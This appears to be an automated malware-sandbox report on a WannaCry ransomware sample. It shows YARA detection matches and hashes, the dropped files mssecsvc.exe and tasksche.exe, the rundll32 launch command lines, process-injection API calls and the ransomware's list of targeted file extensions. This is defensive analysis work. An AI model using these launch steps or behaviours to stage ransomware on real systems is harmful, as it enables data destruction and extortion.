Source: 17.2.mssecsvc.exe.1fd20a4.2.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.2.mssecsvc.exe.24f28c8.8.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.24f28c8.8.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 17.2.mssecsvc.exe.1fd6104.5.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.1fd6104.5.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.24fd8e8.6.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.24fd8e8.6.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Windows\mssecsvc.exe, type: DROPPED	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\mssecsvc.exe, type: DROPPED	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: C:\Windows\mssecsvc.exe, type: DROPPED	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set

Source: Security.evtx.27.dr	Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sysAud
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.27.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.27.dr	Binary string: C:\Device\HarddiskVolume3al0
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.27.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.27.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.27.dr	Binary string: L\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.27.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Security.evtx.27.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.syss
Source: Microsoft-Windows-SMBServer%4Operational.evtx.27.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.27.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.27.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.27.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.27.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.27.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.27.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.27.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.27.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.27.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.27.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.27.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.27.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.27.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.27.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4%%
Source: System.evtx.27.dr	Binary string: C:\Device\HarddiskVolume3irec`

Source: GeW4GzT8G8.dll, tasksche.exe.12.dr, mssecsvc.exe.4.dr

Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: classification engine

Classification label: mal100.rans.troj.expl.evad.winDLL@18/72@2/100

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,

6_2_00AD05F2

Source: C:\Windows\System32\lsass.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\18607d1f-3e87-41d7-b006-51bfc17e9538

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03

Source: GeW4GzT8G8.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GeW4GzT8G8.dll,PlayGame

Source: GeW4GzT8G8.dll	ReversingLabs: Detection: 94%
Source: GeW4GzT8G8.dll	Virustotal: Detection: 75%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GeW4GzT8G8.dll,PlayGame
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",PlayGame
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: unknown	Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GeW4GzT8G8.dll,PlayGame	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",PlayGame	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: ngcpopkeysrv.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: pcpksp.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: tbs.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
